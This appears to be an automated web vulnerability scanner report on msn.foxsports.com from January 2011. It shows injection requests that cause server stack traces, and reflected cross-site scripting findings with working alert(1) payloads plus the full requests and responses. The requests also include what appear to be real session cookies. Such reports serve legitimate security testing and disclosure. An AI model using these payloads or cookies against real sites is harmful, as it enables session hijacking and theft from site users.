User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
nnCoection: close
Date: Sat, 08 Jan 2011 01:32:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 11073

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
ramework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
   $Proxy96.getContent(Unknown Source)
   com.foxsports.action.module.ModuleAction.execute(ModuleAction.java:107)
   sun.reflect.GeneratedMethodAccessor21304.invoke(Unknown Source)
   sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
   java.lang.reflect.Method.invoke(Method.java:597)
   com.opensymphony.xwork2.DefaultActionInvocation.invokeAction(DefaultActionInvocation.java:441)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:243)
   com.opensymphony.xwork2.interceptor.DefaultWorkflowInterceptor.doIntercept(DefaultWorkflowInterceptor.java:165)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   org.apache.struts2.interceptor.validation.AnnotationValidationInterceptor.doIntercept(AnnotationValidationInterceptor.java:68)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ConversionErrorInterceptor.intercept(ConversionErrorInterceptor.java:122)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.StaticParametersInterceptor.intercept(StaticParametersInterceptor.java:179)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237
...[SNIP]...

Request 2

GET /module/*)!(sn=*;jsessionid=B0E37D9CEC4284C917EBD810E61F000A HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response 2

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
nnCoection: close
Date: Sat, 08 Jan 2011 01:32:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 11147

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
ramework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
   $Proxy96.getContent(Unknown Source)
   com.foxsports.action.module.ModuleAction.execute(ModuleAction.java:107)
   sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
   sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
   sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
   java.lang.reflect.Method.invoke(Method.java:597)
   com.opensymphony.xwork2.DefaultActionInvocation.invokeAction(DefaultActionInvocation.java:441)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:243)
   com.opensymphony.xwork2.interceptor.DefaultWorkflowInterceptor.doIntercept(DefaultWorkflowInterceptor.java:165)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   org.apache.struts2.interceptor.validation.AnnotationValidationInterceptor.doIntercept(AnnotationValidationInterceptor.java:68)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ConversionErrorInterceptor.intercept(ConversionErrorInterceptor.java:122)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.StaticParametersInterceptor.intercept(StaticParametersInterceptor.java:179)
   com.opensymp
...[SNIP]...

3. Cross-site scripting (reflected)
There are 26 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://msn.foxsports.com/account/transition [egs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/transition

Issue detail

The value of the egs request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc9cb'%3balert(1)//579517f7bd5 was submitted in the egs parameter. This input was echoed as bc9cb';alert(1)//579517f7bd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/transition?fu=/&initiatingAction=verification&egs=KagpkMXaJne3LURVdXcQmhrRR28%3Dbc9cb'%3balert(1)//579517f7bd5&ts=1294446634&esefsuid=p/k94ON71KoD/EYqOMDzIDg%3D%3D HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D938A2E7A518304E1ECBC406440F8766; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
P3P: CP='DSP CUR OTi IND OTRi ONL FIN'
Expires: Sat, 08 Jan 2011 01:11:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:11:35 GMT
Connection: close
Content-Length: 4126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
UID = 'p/k94ON71KoD/EYqOMDzIDg==';            
   var dateStr = '1294446634';            // Current time in Unix format (i.e. the number of seconds since Jan. 1st 1970)
   var sig = 'KagpkMXaJne3LURVdXcQmhrRR28=bc9cb';alert(1)//579517f7bd5';                // Signature based on siteUID and dateStr

   var params={
    siteUID:EFSUID,
    timestamp:dateStr,
    signature:sig,
    callback: printResponse
   };

   i
...[SNIP]...

3.2. http://msn.foxsports.com/account/transition [esefsuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/transition

Issue detail

The value of the esefsuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4808a'%3balert(1)//a486063946b was submitted in the esefsuid parameter. This input was echoed as 4808a';alert(1)//a486063946b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/transition?fu=/&initiatingAction=verification&egs=KagpkMXaJne3LURVdXcQmhrRR28%3D&ts=1294446634&esefsuid=p/k94ON71KoD/EYqOMDzIDg%3D%3D4808a'%3balert(1)//a486063946b HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1F26DDBC74FE63405456F8B293D5D77E; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
P3P: CP='DSP CUR OTi IND OTRi ONL FIN'
Expires: Sat, 08 Jan 2011 01:11:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:11:41 GMT
Connection: close
Content-Length: 4154


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<!--//
       try{
           if(!fsReqDomain){
               var fsReqDomain = '';
           }
       }catch(e){/*ignore */}
       
       try{
           var efsuid = 'p/k94ON71KoD/EYqOMDzIDg==4808a';alert(1)//a486063946b';
       }catch(e){/*ignore*/}
       
       //-->
...[SNIP]...

3.3. http://msn.foxsports.com/account/transition [fu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/transition

Issue detail

The value of the fu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80af3'%3balert(1)//c6e152d015f was submitted in the fu parameter. This input was echoed as 80af3';alert(1)//c6e152d015f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/transition?fu=/80af3'%3balert(1)//c6e152d015f&initiatingAction=verification&egs=KagpkMXaJne3LURVdXcQmhrRR28%3D&ts=1294446634&esefsuid=p/k94ON71KoD/EYqOMDzIDg%3D%3D HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=8DD6C8A3AD83DDE9E8FED569AAC4AC89; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
P3P: CP='DSP CUR OTi IND OTRi ONL FIN'
Expires: Sat, 08 Jan 2011 01:11:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:11:30 GMT
Connection: close
Content-Length: 4126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
};

function printResponse(response) {
       if ( response.errorCode == 0 ) {
       //alert('Success');
       // Now forward this window to the forwarding URL:
       var forwardingURL = '/80af3';alert(1)//c6e152d015f';
       
       // NB: special logic for if we're calling this from within MSFT's iframe:
if(window.parent){
window.parent.location = forwardingURL;
       } else {

...[SNIP]...

3.4. http://msn.foxsports.com/account/transition [initiatingAction parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/transition

Issue detail

The value of the initiatingAction request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50d5c'%3balert(1)//7b32f916187 was submitted in the initiatingAction parameter. This input was echoed as 50d5c';alert(1)//7b32f916187 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/transition?fu=/&initiatingAction=verification50d5c'%3balert(1)//7b32f916187&egs=KagpkMXaJne3LURVdXcQmhrRR28%3D&ts=1294446634&esefsuid=p/k94ON71KoD/EYqOMDzIDg%3D%3D HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=0145CBDF2E0FD7B8BBEC5691C9CAAB32; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
P3P: CP='DSP CUR OTi IND OTRi ONL FIN'
Expires: Sat, 08 Jan 2011 01:11:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:11:32 GMT
Connection: close
Content-Length: 4126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<!-- END: Gigya client defs -->

   function onLoadHandler() {

       var initiatingAction = 'verification50d5c';alert(1)//7b32f916187'; // right now, either "registration", "verification", "login" or "logout"
       
       <!-- BEGIN: Gigya call -->
...[SNIP]...

3.5. http://msn.foxsports.com/account/transition [ts parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/transition

Issue detail

The value of the ts request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 448ad'%3balert(1)//5d5d5f1d08e was submitted in the ts parameter. This input was echoed as 448ad';alert(1)//5d5d5f1d08e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/transition?fu=/&initiatingAction=verification&egs=KagpkMXaJne3LURVdXcQmhrRR28%3D&ts=1294446634448ad'%3balert(1)//5d5d5f1d08e&esefsuid=p/k94ON71KoD/EYqOMDzIDg%3D%3D HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=595CA7DAE1C347A219B907C529C4E2F9; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
P3P: CP='DSP CUR OTi IND OTRi ONL FIN'
Expires: Sat, 08 Jan 2011 01:11:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:11:37 GMT
Connection: close
Content-Length: 4126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<!-- BEGIN: Gigya call -->
       
       var EFSUID = 'p/k94ON71KoD/EYqOMDzIDg==';            
   var dateStr = '1294446634448ad';alert(1)//5d5d5f1d08e';            // Current time in Unix format (i.e. the number of seconds since Jan. 1st 1970)
   var sig = 'KagpkMXaJne3LURVdXcQmhrRR28=';                // Signature based on siteUID and dateStr

   var params={

...[SNIP]...

3.6. http://msn.foxsports.com/boxing/gallery [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /boxing/gallery

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 876c5'-alert(1)-'117182e5aaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /boxing/gallery?876c5'-alert(1)-'117182e5aaa=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 220967
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=9
Date: Sat, 08 Jan 2011 01:18:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/boxing/gallery?876c5'-alert(1)-'117182e5aaa=1';

       startComments('StoryComments', '209'); // load up team comments
   </script>
...[SNIP]...

3.7. http://msn.foxsports.com/boxing/odds/moneyline [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /boxing/odds/moneyline

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 17502--><a>7c62d5583cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /boxing/odds/moneyline17502--><a>7c62d5583cc HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 179220
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=27
Date: Sat, 08 Jan 2011 01:19:59 GMT
Connection: close


